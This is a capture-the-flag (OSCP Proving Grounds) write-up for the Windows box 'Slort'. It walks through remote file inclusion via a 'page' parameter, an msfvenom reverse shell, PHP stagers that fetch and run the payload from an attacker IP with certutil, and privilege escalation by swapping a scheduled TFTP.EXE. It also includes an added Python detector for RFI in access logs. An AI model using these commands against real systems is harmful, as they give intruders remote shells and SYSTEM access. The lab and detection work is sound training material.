OSCP/Proving Ground
37. Slort (GET TO WORK) - Windows (RFI.php, systeminfo)
takudaddy
2022. 9. 3. 23:07
1. Enumeration
: port scan
![](https://blog.kakaocdn.net/dn/bkqJZC/btrLadABbgU/SZjhmbnt0jQXZ8zvBW8ua1/img.png)
![](https://blog.kakaocdn.net/dn/BiClS/btrLcI0oJS2/azElShA2Ftp8R1tyfRwN3k/img.png)
> Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
> FileZilla ftpd 0.9.41 beta
: smb enum
![](https://blog.kakaocdn.net/dn/mMmBq/btrLc7Z6fDU/M5i7vYWkikMckJGg9PRrN0/img.png)
> SLORT
: directory enum
![](https://blog.kakaocdn.net/dn/k7d0b/btrLecGV0ST/pFvKA2T30rf8e7RaHrZFP0/img.png)
: web enum
![](https://blog.kakaocdn.net/dn/cBDPGA/btrLedy4QKs/kOF02bsWfAewkzghVySIkK/img.png)
> `page` parameter
2. Exploitation
: RFI attempt
![](https://blog.kakaocdn.net/dn/b1HhxY/btrLcf48DqN/jLk4oKZNLZ7uElpJ1MJUH1/img.png)
![](https://blog.kakaocdn.net/dn/bV8hOY/btrLaWrANgM/8jkmq7Ov9RDvIRGFJAFEz0/img.png)
> Success!
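As an added example that is not part of the original writeup, the following Python snippet scans Apache access-log lines for the shape of the RFI attempt shown above: a query parameter such as `page` whose value is a remote URL (a defender's detection, not part of the box). The log lines, paths and IP addresses in it are constructed for the example.

```python
# Added example: flag RFI-style requests in Apache access logs.
# A remote file inclusion through a `page` parameter shows up in the
# access log as a query value that is itself a URL (http://, ftp://, //...).
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache combined/common log prefix: client, user, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Wrappers PHP's include() will fetch when allow_url_include is enabled,
# plus protocol-relative URLs.
REMOTE_PREFIX = re.compile(r'^(?:https?|ftp|ftps|php|data)://|^//', re.IGNORECASE)

# Constructed sample log (TEST-NET addresses, hypothetical paths).
SAMPLE_LOG = [
    '10.0.0.5 - - [03/Sep/2022:14:07:01 +0900] "GET /site/index.php?page=main.php HTTP/1.1" 200 1532',
    '10.0.0.9 - - [03/Sep/2022:14:07:15 +0900] "GET /site/index.php?page=http://192.0.2.10/shell.php HTTP/1.1" 200 88',
    '10.0.0.9 - - [03/Sep/2022:14:07:20 +0900] "GET /site/index.php?page=%2568ttp%253A%252F%252F192.0.2.10%252Fx.php HTTP/1.1" 200 88',
    '10.0.0.5 - - [03/Sep/2022:14:08:02 +0900] "GET /site/index.php?page=about.php HTTP/1.1" 200 1411',
]


def find_rfi_attempts(lines):
    """Return (client_ip, param_name, decoded_value) for every request whose
    query-string value points at a remote resource."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand
        query = urlsplit(m.group('target')).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            # parse_qsl decodes once; decode again to catch double-encoded values.
            decoded = unquote(value).strip()
            if REMOTE_PREFIX.search(decoded):
                hits.append((m.group('ip'), name, decoded))
    return hits


if __name__ == '__main__':
    for ip, param, value in find_rfi_attempts(SAMPLE_LOG):
        print(f'RFI attempt from {ip}: {param}={value}')
```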
: reverse shell
> Needed: reverse.exe + a PHP script that downloads the shell + a PHP script that runs the shell
1. reverse.exe
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.49.148 LPORT=4443 --format exe -o reverse.exe
-----------------------------------
2. down_shell.php (downloads the reverse shell file onto the target)
<?php
$exec = system('certutil.exe -urlcache -f "http://192.168.49.148/reverse.exe" reverse.exe', $val);
?>
------------------------------------
3. exec_shell.php (runs the reverse shell file)
<?php
$exec = system('reverse.exe', $val);
?>
![](https://blog.kakaocdn.net/dn/bAFQbg/btrLk4oKBGC/D7qRolj1cOO6ewg2coSy0K/img.png)
> File downloaded + executed
![](https://blog.kakaocdn.net/dn/bfVOSq/btrLh86K8Fc/NnCVMgSVWTTB8E9QtDJ1zk/img.png)
![](https://blog.kakaocdn.net/dn/bmebQm/btrLgYRnizI/py9xRIpq351bRsTVA2YBt1/img.png)
Initial access successful!
3. Privilege Escalation
: Check OS & version details
C:\> systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
![](https://blog.kakaocdn.net/dn/c2wR5P/btrLg8sTDja/W4gya3hfsQt3ttA2uRUZq0/img.png)
: Directory Enum
![](https://blog.kakaocdn.net/dn/MZYGR/btrLkavZiUY/OpF46dkKxXz5kftXYycGA0/img.png)
> Backup
![](https://blog.kakaocdn.net/dn/bvXxZc/btrLhQFen9X/OgRMHPXF05AIlFihqhaecK/img.png)
> TFTP.EXE is run every 5 minutes (presumably with SYSTEM privileges)
> Approach = replace the TFTP.EXE file with the reverse shell file
1) Download the reverse.exe file prepared earlier
C:\> powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.49.148/reverse.exe', '
![](https://blog.kakaocdn.net/dn/cVyQQ6/btrLh9xOXFn/394LZ0XWkM0ZLFtvtVsWNK/img.png)
![](https://blog.kakaocdn.net/dn/dszMzv/btrK95v4nqI/ybC0JXDCeT6VegPes1y0kk/img.png)
2) Start the listener and wait a little
![](https://blog.kakaocdn.net/dn/colzkk/btrLh9q2Zf7/1rPV9u3khWoFcDZP65Qlp1/img.png)
Done